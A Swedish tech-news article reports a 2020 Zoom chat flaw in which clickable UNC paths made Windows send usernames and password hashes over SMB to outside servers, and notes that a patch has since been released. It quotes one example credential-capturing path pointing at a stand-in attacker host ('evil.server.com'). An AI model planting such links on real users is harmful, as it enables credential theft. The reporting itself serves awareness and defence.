Bugg i Zoom låter hackare stjäla ditt Windows-lösenord

2020-04-02 10:17  
Foto: Gado Images

Chattprogrammets hantering av länkar gör det enkelt att lura till sig användarnamn och lösenord till Windows.

Uppdatering 2020-04-03: Zoom har nu släppt en uppdatering till mjukvaran som åtgärdar problemet, rapporterar PCWorld. För att vara på säkra sidan bör du se till att Zoom är uppdaterad till version 4.6.9 (19253.0401) eller senare.

Mötestjänsten Zoom har fått ett rejält uppsving i coronaepidemins spår. Men appen har en lång historia av säkerhets- och integritetsproblem.

Förra veckan upptäcktes en ny sårbarhet som gör det möjligt att stjäla andra mötesdeltagares inloggningsuppgifter till Windows, rapporterar tekniksajten Bleeping Computer.

Genom att dela en viss typ av länkar i chatten går det att lura till sig andra mötesdeltagares användarnamn och en krypterad kopia av deras Windows-lösenord.

Läs mer: Med framtidens möten blir social distans ett minne blott

Roten till problemet finns i hur Zoom hanterar länkar som postas i meddelandefönstret. Precis som de flesta andra tjänster konverterar Zoom webbadresser så att de automatiskt går att klicka på. Skriver du exempelvis in ”nyteknik.se” i chattrutan blir det automatiskt en klickbar hyperlänk.

Zoom hanterar vissa adresser fel

Men Zoom gör tyvärr detsamma om någon klistrar in en UNC-formaterad sökväg i Windows.

Det är en slags adress som pekar mot exempelvis en mapp, en applikation eller en server. Bleeping Computer gör exemplet ”\\evil.server.com\images\cat.jpg”.

När en Windows-användare klickar på adressen ovan, som går till en bildfil som ligger på en extern server, försöker datorn automatiskt ansluta via ett protokoll som heter SMB. Då skickar datorn automatiskt med användarens inloggningsuppgifter – användarnamn och en krypterad version av lösenordet.

Läs mer: Nu används över en exaflops för att kartlägga coronaviruset

Bleeping Computer konstaterar att även om lösenordet är hashat finns det gratisverktyg på nätet som gör det möjligt att snabbt knäcka korta lösenord med en kraftfull dator. Du kan läsa mer om hur det fungerar i en tidigare artikel i Ny Teknik.

Zoom uppger att de känner till problemet, och jobbar på en lösning. Bleeping Computer har också beskrivit i sin artikel hur det tillfälligt går att stoppa datorn från att skicka ut inloggningsuppgifter i det här scenariot.

Simon Campanello

Mer om: Zoom Videochatt

Kommentarer

Välkommen att säga din mening på Ny Teknik.

Principen för våra regler är enkel: visa respekt för de personer vi skriver om och andra läsare som kommenterar artiklarna. Alla kommentarer modereras efter publiceringen av Ny Teknik eller av oss anlitad personal.

  Kommentarer

Debatt